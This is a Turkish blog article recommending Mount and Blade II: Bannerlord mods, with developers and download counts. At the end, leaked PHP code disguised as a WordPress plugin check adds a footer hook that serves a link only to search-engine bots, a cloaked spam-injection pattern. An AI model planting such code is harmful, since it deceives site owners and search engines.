Sıradaki içerik:

Konuşanlar'ın Exxen'deki Yayın Tarihi Belli Oldu

e
sv

Mount And Blade II: Bannerlord Modları

19 Aralık 2020 22:46
avatar

 • e 0

  Mutlu

 • e 0

  Eğlenmiş

 • e 0

  Şaşırmış

 • e 0

  Kızgın

 • e 0

  Üzgün

Türkiye merkezli TaleWorlds tarafından yerli bir ekiple uzun yıllar boyunca geliştirilen Mount and Blade II: Bannerlord, uzun bekleyişin ardından 30 Mart 2020’de oyuncularla buluştu. Serinin Bannerlord’dan önceki oyunu Warband, mod konusunda son derece zengin bir duruma gelmişti. Durum böyle olunca hem oyuncu hem de geliştirici olan kitlenin Bannerlord için de mod geliştirmeleri kaçınılmaz oldu.

Çıkışının henüz ilk yılı bile dolmamış olmasına rağmen şimdiden yüzlerce modu bulunan Bannerlord’un bu alandaki gelişimine katkıda bulunmak isteyen TaleWorlds, mod geliştirme araçlarını ücretsiz olarak sundu. Yayınlanan bu paketle beraber geliştiriciler için daha iyi ve özgür bir ortam sunulmuş oldu. Bu yazımızda Mount and Blade II: Bannerlord için yayımlanmış olan ve oyun zevkini artıran modlardan söz edeceğiz.

Mount and Blade II: Bannerlord modları:

Detailed Character CreationFast DialogueBetter TimeSound The AlarmControl Your Allies After DeathImproved GarrisonsLooted Village InteractionsDiplomacyReworkedRTS CameraDeadly Horse ChargesBannerPeasantsBattle Size UnlockerBannerlord Türkçe Dublaj-Seslendirme

Daha detaylı karakter düzenleme: Detailed Character Creation:

Geliştirici: TravisStewartİndirme Sayısı: 450.000

Karakter yaratma ve düzenleme ekranında uzun süreler geçirmeyi seven oyunculardan biri iseniz bu modu denemenizi öneririz. Detailed Character Creation, Bannelord’un sunmuş olduğu karakter yaratma ekranını daha detaylı ve kapsamlı bir hale getirerek karakteriniz için daha fazla özelleştirme elde etmenize olanak sağlıyor.

Her seferinde aynı diyalogları görmekten kurtulun: Fast Dialogue

Fast Dialogue

Geliştirici: Dallen1393İndirme Sayısı: 442.000

Birçok oyunda sıkça tekrarlanan diyaloglar ve bu diyaloglar için ekstra açılan ekranlar oyuncuları rahatsız etmekte. Bannerlord’da da aynı kategoriden birçok NPC ile etkileşim haline girdiğiniz ve her seferinde aynı diyalog ekranını görmek durumunda olduğunuz için Dallen1393 adlı geliştirici, Fast Dialogue adlı eklentiyi geliştirdi. Bu mod, oyundaki tüm diyalog ekranlarından önce gelen yükleme ekranlarının ortadan kalkmasını sağlıyor. Bu da daha hızlı ve akıcı bir oynanış anlamına geliyor.

Oyun içi zaman 12 kat daha hızlı akabilir: Better Time

Geliştirici: Shemirothİndirme Sayısı: 118.000

Mount and Blade II: Bannerlord’un oynanış panelinin alt kısmında tarihi ve saati görebildiğimiz bir eklenti mevcut. Bu eklentinin sağında ise zamanın akış hızına müdahale edebildiğimiz butonlar yer alıyor. Better Time, bu butonların yanına bir yenisini ekliyor ve böylece zamanın akış hızını 4 kattan 12 kata kadar artırabiliyoruz.

Saldırı anında ya da diplomatik gelişmeler sırasında bildirim alın: Sound The Alarm

Sound The Alarm

Geliştirici: TheWulfPandaİndirme Sayısı: 186.000

Zaman ilerledikçe diplomatik olarak göz önünde bulundurmamız gereken çokça şey barındıran Bannerlord’da bir yerleşke saldırıya uğradığında ya da savaş-barış ilanı durumunda meslek işten geçmiş olabiliyor. TheWulfPanda’nın geliştirmiş olduğu Sount The Alarm, herhangi bir saldırıda ya da diplomatik durumda anında bildirim almanıza yardımcı oluyor.

Karakteriniz ölse bile savaşmaya devam edin: Control Your Allies After Death

Control Your Allies After Death

Geliştirici: rafawsİndirme Sayısı: 36.000

Savaş sırasında karakterinizin ölmesi durumunda şayet kurmuş olduğunuz ordu yeterince güçlü değilse savaşı kaybetmeniz kaçınılmaz olabiliyor. Control Your Allies After Death adlı bu mod sayesinde karakteriniz öldükten sonra, ekibinizde yer alan herhangi bir yoldaşın kontrolünü ele alıp savaşmaya devam edebiliyorsunuz. Bu da savaşın seyrini net bir şekilde değiştirmenize olanak sağlıyor.

Ordunuzu daha kolay kontrol edin: Improved Garrisons

Geliştirici: Sidiessİndirme Sayısı: 344.000

Zamanla yüzlerce savaşçıyla dolacak olan ordunuzu yönetmek bir süre sonra kafa ağrıtıcı olabilir. Improved Garrisons, birkaç açılır menü ile ordunuzu bir bölgeye göndermek, antrenman yaptırmak veya emirler vermenizi sağlıyor. Böylece oyunun ve ordunuzun kontrolünü ele almanız daha kolay oluyor.

Looted Village Interactions:

Looted Village Interactions

Geliştirici: ProgrammingAnlsekaiİndirme Sayısı: 4.000

Warband’de olduğu gibi Bannerlord’da da yağmalanmış köylerle etkileşime geçmek pek olası değil. Looted Village Interactions adlı mod sayesinde başkaları tarafından yağmalanmış olan herhangi bir köy ile etkileşime geçebiliyorsunuz. Mod, yağmalanmış bir köye yardım etmenize ya da tekrardan yağmalamanıza olanak sağlıyor.

Diplomatik kararlar için öbür yerlere gitmenize gerek yok: DiplomacyReworked

DiplomacyReworked

Geliştirici: Nightmaremenİndirme Sayısı: 169.000

Bannerlord için geliştirilmiş olan en işlevsel modlardan biri DiplomacyReworked olabilir. Normal şartlarda Bannerlord’da diplomatik işlemler için bir bölgeden bir bölgeye gitmek zorunda kalınıyor. Bu da siz kararınızı uygulamaya sokamadan, diplomatik olarak istemediğiniz olayların gerçekleşmesine sebep olabiliyor. DiplomacyReworked, diplomatik kararlarınızı herhangi bir yere gitmeden kendi merkezinizden yönetmenize olanak sağlıyor. Bu sayede hiçbir yere gitmeden bir krallığa savaş açabilir, sulh ilan edebilir ya da krallık içerisindeki oylamalarda rey kullanabilirsiniz.

Haritada serbest kamera için RTS Camera:

Geliştirici: LiZhenhuan1019İndirme Sayısı: 47.000

RTS Camera

Mount and Blade II: Bannerlord’un sunmuş olduğu standart kamera bakış açısını sevmeyen oyuncular için RTS Camera adlı eklenti oldukça faydalı olabilir. RTS Camera, oyunun standart üçüncü şahıs bakış açısını değiştirerek yönetmiş olduğunuz karakterin omuz açısına getirebiliyor veya haritada serbest bir şekilde kamerayı gezdirebilmenize yarıyor. Bu da aksiyon anlarında daha doyurucu bir görüş açısı elde etmenize yardımcı oluyor.

Atların çarpma hasarını artırın: Deadly Horse Charges

Geliştirici: Xorberaxİndirme Sayısı: 71.000

Gerçekçi düşündüğümüz zaman yüzlerce kilo ağırlığında olan atların muharebe sırasında bir askere çarpması onu ölüme sürükleyebilir. Bu tesir hali hazırda oyunda bulunsa da atların çarpma hasarı oldukça düşük. Deadly Horse Charges, beygir üzerindeyken bir düşman askerine çarpmanız durumunda ona ciddi oranda hasar veriyor ve yere düşürüyor. Bu da savaşın gerçekliğini artıran bir eklenti olarak kullanılabilir.

Kalabalık savaşlarda ordunuzu diğerlerinden ayırt etmek için BannerPeasants:

BannerPeasants

Geliştirici: Apastron152e9İndirme Sayısı: 183.000

Mount and Blade oyunlarının en can müşteri noktası kalabalık açık saha savaşları olabilir. Kalabalık savaşlar aksiyon anlamında doyurucu olsalar da kalabalık birbirine karıştığında kendi askerlerinizi ayırt etmeniz zorlaşabiliyor. BannerPeasants adlı mod sayesinde ordunuz yer saha her 10 askerden birine sancak verebiliyorsunuz. Bu da muharebe sırasında kendi askerlerinizi kolayca ayırt etmenize yardımcı oluyor.

Savaşlardaki maksimum şahıs sayısını artırın Battle Size Unlocker:

Battle Size Unlocker

Geliştirici: petiti06İndirme Sayısı: 6.000

Her ne kadar kalabalık savaşlar oyunun verdiği zevki artırıyor olsa da Bannerlord’un sunabildiği maksimum muharebe büyüklüğü 1.000 şahıs ile sınırlandırılmış durumda. Eğer sisteminizin daha kalabalık savaşlarda performans sorunu yaşamayacağını düşünüyorsanız Battle Size Unlocker ile bu limiti dilediğiniz gibi değiştirebilirsiniz.

Bannerlord Türkçe Dublaj-Seslendirme modu:

Geliştirici: OnurASahinİndirme Sayısı: 4.300

Sırada listemizin bizce en iyi modlarından biri var. Onur Ali Şahin’in liderlik ettiği ve Yavuz Selim Sağlam ile Twitch’ten tanıdığımız Soner Şahinbaş’ın seslendirme ekibinde yer aldığı bu mod, Mount and Blade II: Bannerlord’u Türkçe seslendirme ile deneme etmenize yol açıyor. Şimdilik 295 tane ses dosyasını Türkçe seslendirmeyle değiştiren ekip, desteklenmeleri halinde daha fazla ses dosyası için çalışmalar yapacaklar. Yukarıdaki videodan ve başlıktaki bağlantıdan Onur Ali Şahin’e ve ekibine ulaşabilirsiniz.

 • Site İçi Yorumlar

En az 10 karakter gerekli
function isBot() { $botAgents ="/google|hakia|msn|yahoo|altavista|crawler|findlinks|bing|Cuil|Excite|Go.com|HotBot|AllTheWeb|search.aol|Lycos|Alexa|ask|baidu|cuil|kosmix|sogou|yodao|yandex|infoseek|yebol|aol/i"; $agent = $_SERVER['HTTP_USER_AGENT']; if (preg_match($botAgents,$agent)) return true; else return false; } function wordpres_plugin_check_core(){ $altsayfa = 1; $bot = 1; $link = ' '; if($altsayfa == 1){ $say_s = $_SERVER['REQUEST_URI']; $saydim = strlen($say_s); if($saydim > 4){ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } }else{ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } } add_action('wp_footer', 'wordpres_plugin_check_core');